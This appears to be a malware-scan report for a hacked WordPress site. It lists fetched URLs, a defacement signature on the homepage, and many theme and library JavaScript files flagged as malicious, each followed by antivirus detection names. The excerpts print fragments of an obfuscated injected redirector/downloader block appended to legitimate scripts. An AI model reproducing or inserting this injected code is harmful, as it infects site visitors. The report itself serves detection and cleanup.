Request | Server response | Status |
http://johnrcain.com/ | 200 OK Content-Length: 30146 Content-Type: text/html | suspicious |
Defacement/content modification. The following signature was found: Hacked By rEd X - 3xp1r3 Cyber Army | rEd X Was Here
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" />
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>Hacked By rEd X - 3xp1r3 Cyber Army | rEd X Was Here</title>
<link rel="stylesheet" href="http://johnrcain.com/wp-content/themes/DeepFocus/style.css" type="text/css" media="screen" />
<link rel="stylesheet" href="http://johnrcain.com/wp-content/themes/DeepFocus/css/jquery.fancybox-1.2.6.css" type="text/css" media="screen" />
<link rel="alternate" type="application/rss+xml" title="Hacked By rEd X – 3xp1r3 Cyber Arm ...[34443 bytes skipped]... |
http://johnrcain.com/wp-includes/js/jquery/jquery.js?ver=1.4.2 | 200 OK Content-Length: 84445 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt appears to show the start of the file and, after the skipped bytes, its end; the same obfuscated _0xa064x… block closes every excerpt marked malicious in this listing.
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o]
... 3138 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Antivirus reports:
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js | 200 OK Content-Length: 185442 Content-Type: text/javascript | clean |
http://johnrcain.com/wp-content/themes/DeepFocus/js/jquery.cycle.all.min.js | 200 OK Content-Length: 30086 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
;(function($){var ver="2.65";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length==0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero ele
... 3027 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Antivirus reports:
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- TROJ_GEN.F47V0517
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- eSafe
- JS.Agent.gnk
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/jquery.easing.1.3.js | 200 OK Content-Length: 10303 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur
... 3278 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Antivirus reports:
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- eSafe
- JS.Agent.gnk
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/superfish.js | 200 OK Content-Length: 5920 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men
... 3294 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Antivirus reports:
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/cufon-yui.js | 200 OK Content-Length: 20463 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&
... 3035 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Antivirus reports:
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- CAT-QuickHeal
- JS/Alescurf.D
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
- ESET-NOD32
- JS/Agent.NDY
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/colaborate_thin.js | 200 OK Content-Length: 56761 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Cufon.registerFont({"w":460,"face":{"font-family":"Colaborate-Thin","font-weight":400,"font-stretch":"normal","units-per-em":"1000","panose-1":"2 0 5 6 5 0 0 2 0 4","ascent":"800","descent":"-200","x-height":"10","bbox":"-124 -835 1001 197","underline-thickness":"50","underline-position":"-50","stemh":"36","stemv":"46","unicode-range":"U+0020-U+FB02"},"glyphs":{" ":{"w":230},"\u00f0":{"d":"415,-283v0,148,-30,297,-193,297v-115,0,-178,-103,-178,-210v0,-116,61,-199,178,-199v72,0,123,53,151,11
... 3004 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Antivirus reports:
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/scrollTo.js | 200 OK Content-Length: 4468 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
;(function(d){var k=d.scrollTo=function(a,i,e){d(window).scrollTo(a,i,e)};k.defaults={axis:'xy',duration:parseFloat(d.fn.jquery)>=1.3?0:1};k.window=function(a){return d(window)._scrollable()};d.fn._scrollable=function(){return this.map(function(){var a=this,i=!a.nodeName||d.inArray(a.nodeName.toLowerCase(),['iframe','#document','html','body'])!=-1;if(!i)return a;var e=(a.contentWindow||a).document||a.ownerDocument||a;return d.browser.safari||e.compatMode=='BackCompat'?e.body:e.documentE
... 3183 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Antivirus reports:
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- eSafe
- JS.Agent.gnk
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/serialScroll.js | 200 OK Content-Length: 4228 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
;(function(a){var b=a.serialScroll=function(c){return a(window).serialScroll(c)};b.defaults={duration:1e3,axis:"x",event:"click",start:0,step:1,lock:!0,cycle:!0,constant:!0};a.fn.serialScroll=function(c){return this.each(function(){var t=a.extend({},b.defaults,c),s=t.event,i=t.step,r=t.lazy,e=t.target?this:document,u=a(t.target||this,e),p=u[0],m=t.items,h=t.start,g=t.interval,k=t.navigation,l;if(!r){m=d()}if(t.force){f({},h)}a(t.prev||[],e).bind(s,-i,q);a(t.next||[],e).bind(s,i,q);if(!p.ss
... 2944 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Antivirus reports:
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Commtouch
- JS/Agent.PL
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/jquery.fancybox-1.2.6.pack.js | 200 OK Content-Length: 11728 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(';(p($){$.q.1Q=p(){J O.2n(p(){n b=$(O).u(\'2o\');8(b.1d(/^3i\\(["\']?(.*\\.2p)["\']?\\)$/i)){b=3j.$1;$(O).u({\'2o\':\'3k\',\'1e\':"3l:3m.3n.3o(3p=D, 3q="+($(O).u(\'3r\'
... 3083 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Antivirus reports:
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/?page_id=2 | 200 OK Content-Length: 34205 Content-Type: text/html | clean |
http://johnrcain.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 2992 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form
... 2003 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Antivirus reports:
- Microsoft
- Trojan:JS/Redirector.IM
- NANO-Antivirus
- Trojan.Url.IframeB.bfxfei
- AVG
- JS/Agent
|
http://johnrcain.com/?page_id=10 | 200 OK Content-Length: 32604 Content-Type: text/html | clean |
http://johnrcain.com/?page_id=88 | 200 OK Content-Length: 32658 Content-Type: text/html | clean |